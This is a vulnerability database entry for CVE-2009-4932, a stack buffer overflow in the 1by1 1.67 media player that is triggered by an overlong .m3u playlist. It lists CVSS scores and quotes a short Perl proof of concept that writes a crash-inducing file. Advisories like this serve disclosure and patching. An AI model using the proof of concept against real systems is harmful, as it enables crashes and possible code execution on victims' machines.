6.8
CVSSv2

CVE-2009-4932

Published: 12/07/2010 Updated: 19/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Stack-based buffer overflow in 1by1 1.67 (aka 1.6.7.0) allows remote malicious users to cause a denial of service (application crash) or possibly execute arbitrary code via a long string in a .m3u playlist file.

Vulnerable Product Search on Vulmon Subscribe to Product

mpesch3.de1 1by1 1.67

Exploits

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## # # # 1by1 167 (M3U File) Local Stack Overflow POC # # # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## # my $chars= "A" x 4104; my $file="goldmm3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file has been created \n" ...